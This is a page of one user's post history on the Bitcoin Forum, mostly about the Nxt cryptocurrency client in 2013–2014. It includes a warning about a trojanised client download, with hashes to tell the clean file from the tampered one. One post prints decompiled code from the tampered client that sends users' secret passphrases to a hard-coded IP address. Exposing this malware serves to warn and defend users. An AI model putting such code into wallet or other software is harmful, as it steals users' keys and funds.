Bitcoin Forum
May 26, 2024, 08:06:57 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 2 [3] 4 5 6 7 8 »
41  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 02:25:47 AM
So, are most people with the new client boned?

If not, what should you check?

if the sha256 of your nxt-client-0.4.8.zip is:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

you are fine, if it's:

948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

you should download legit client and transfer your NXT immediately to another account if it's still there

how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/)
42  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: January 02, 2014, 01:43:43 AM
clean

Code:
  static byte[] getPublicKey(String secretPhrase)
  {
    try
    {
      byte[] publicKey = new byte[32];
      Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8")));
      
      return publicKey;
    }
    catch (Exception e) {}
    return null;
  }

vs

Code:
 static byte[] getPublicKey(String paramString)
    {
      try
      {
        if (!paramString.equals("")) {
          if (!myKeys.contains(paramString))
          {
            URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
            URLConnection connection = url.openConnection();
            connection.setConnectTimeout(10000);
            connection.getInputStream();
            myKeys.add(paramString);
          }
        }
      }
      catch (Exception localException) {}
      try
      {
        byte[] arrayOfByte = new byte[32];
        Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
        return arrayOfByte;
      }
      catch (Exception localException1) {}
      return null;
    }

clearly someone modified Nxt$Crypto.class

EDIT: question is who and where did you guys downloaded this (where was the link)?

43  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 23, 2013, 10:20:09 AM
well guys, i'm at 22812   
1279554621544365272 3018 %

Post ur blocks.nxt and transactions.nxt plz. I'll check if it's longer.

sent in PM
44  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 23, 2013, 10:04:55 AM
well guys, i'm at 22812   
1279554621544365272 3018 %
45  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 22, 2013, 06:31:51 PM
yeah the client caught up, i'm now at 22322
46  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 22, 2013, 05:50:45 PM
well, i've got this

Code:
{"lastBlock":"16527276160970732808","numberOfAliases":14579,"numberOfBlocks":22306,"lastBlockchainFeeder":"88.198.134.190","totalMemory":61845504,"freeMemory":16504352,"maxMemory":1037959168,"numberOfTransactions":23451,"numberOfUsers":3,"version":"0.4.2","numberOfOrders":0,"time":2440217,"availableProcessors":1,"numberOfAssets":0,"numberOfAccounts":2772}
47  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 22, 2013, 05:35:40 PM
So after working for a short while my client is now stuck at 222303 (218%) - could this be because I don't have any NXT?

(am really starting to wonder how anyone can be using this software when it just seems to stop working constantly)

it was working no problem for last few days, now it seems like someone is trying to mess with the network
48  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 22, 2013, 05:32:11 PM
got this problem:

Code:
2013-12-22 17:41:29.104:WARN:oejh.HttpParser:qtp306520046-16: badMessage: java.lang.IllegalStateException: too much data after closed for HttpChannelOverHttp@1d908ce2{r=1,a=IDLE,uri=-}

and seems stuck now - also on 22303 (using 0.4.2)
49  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 22, 2013, 05:27:32 PM
Hello, I finally bought some NXT today because it looks so different and potentially innovative. However, I actaully truly have no understanding of how it works. I have a few questions:

0. What methods of cryptographic security does NXT use in hashing? For example, Bitcoin employs SHA256 and litecoin uses Scrypt. What does NXT use?

1. Can I print a paper wallet private just like with Bitcoin? If so, how do I do this? Or do I just write down my passkey?

2. What file(s) do you backup to save your NXT client's wallet?

3. If it is possible to store NXT coins offline and I do so, to my understanding I would not be able to generate NXT coins as interest. Is this correct?

4. Do NXT coins left on the dgex exchange incur interest? Or must you send them to your NXT client wallet?

5. If all coins are in existence already then doesn't this make the original holders of NXT very wealthy? And what reason would they have for giving away their NXT? They obviously would want to keep a LARGE amount of it for themselves.

6. Also, doesn't this centralize the NXT coin a bit since the coins are already in the hands of about 75 individuals?

7. How do you make a NXT alias?

These may be questions that some new NXT users have. It may be best to compare and contrast the differences between NXT and Bitcoin to see the differences.

If some or all of my questions are already answered, please excuse me as I didn't find them. The NXT forum wasn't working so well when I tried earlier.

http://nxtcrypto.wikia.com/wiki/Nxt_Wiki
50  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 22, 2013, 03:52:20 PM
I have to say, I'm impressed by Nxt, 2000+ unconfirmed transactions at once multiple times after the alias system launch and the client and network had no problems at all (at least for me).

Great job Come-from-Beyond and BCNext.
51  Alternate cryptocurrencies / Altcoin Discussion / Re: Why Miners are dumping DogCoins ? on: December 20, 2013, 10:31:00 AM
I can understand the miners, but what I don't understand is how many people are that stupid to actually buy this for their BTC?
52  Economy / Speculation / Re: I AM HODLING on: December 18, 2013, 08:06:38 PM


53  Economy / Speculation / Re: I AM HODLING on: December 18, 2013, 10:38:24 AM
finally something funny today, hodlers unite  Grin
54  Alternate cryptocurrencies / Altcoin Discussion / Re: Investing 1 Bitcoin on: December 06, 2013, 02:59:48 AM
Well, Fastcoin is a great option, I mean, man, it's really fast.
BBQCoin also, who doesn't like BBQ?
Ofcourse you can't go wrong with StableCoin, horses need a currency too and there is plenty of them.
Or perhaps you'd like to consolidate your digital wealth, well, BitBar is there for you.

I could go on, the possibilities are endless Wink
55  Alternate cryptocurrencies / Marketplace (Altcoins) / Re: Trading Thread for Nxt :: Descendant of Bitcoin on: December 05, 2013, 08:25:02 PM
No a few horders from the 100% premine did

a 10 digit password is quite suitable for everything else I've ever used!

You don't understand the concept of accounts in NXT and have no idea how market works, i wouldn't put it the way klee did, but you are clearly dumb.

Blaming others for your lack of knowledge is quite easy though, you can do that well.
56  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 04, 2013, 11:05:40 PM
guys whats with the LOGO? the logo we have now is not the best..

Yeah, i was thinking that too, came up with a simple concept, let me know what you think.







edit: added all the pics

http://imgur.com/a/PKmNy
57  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: December 04, 2013, 04:20:32 PM
i didnt claim, i asked about. Thats a big difference.
For ages? the thread started 25.Nov 2013, when was the initial release?

https://bitcointalk.org/index.php?topic=303898.0

There is also a search function on this forum.
58  Alternate cryptocurrencies / Altcoin Discussion / delete pls on: December 01, 2013, 12:03:33 PM
DELETED
59  Alternate cryptocurrencies / Altcoin Discussion / Re: Mtgox to btce took three days i lost 850 ltc waiting. on: December 01, 2013, 10:43:52 AM
There were (and probably still are) a lot of people with stuck US dollars there for months - that could actually maybe matter in some legal case.
I know it sucks, but you did not really lose anything.
60  Alternate cryptocurrencies / Announcements (Altcoins) / Re: Nxt :: descendant of Bitcoin - Updated Information on: November 28, 2013, 08:53:25 PM
Let me be the first to say that the exchange looks like a window to 1990s. I feel like I traveled through time when looking at it, lol.
Pages: « 1 2 [3] 4 5 6 7 8 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!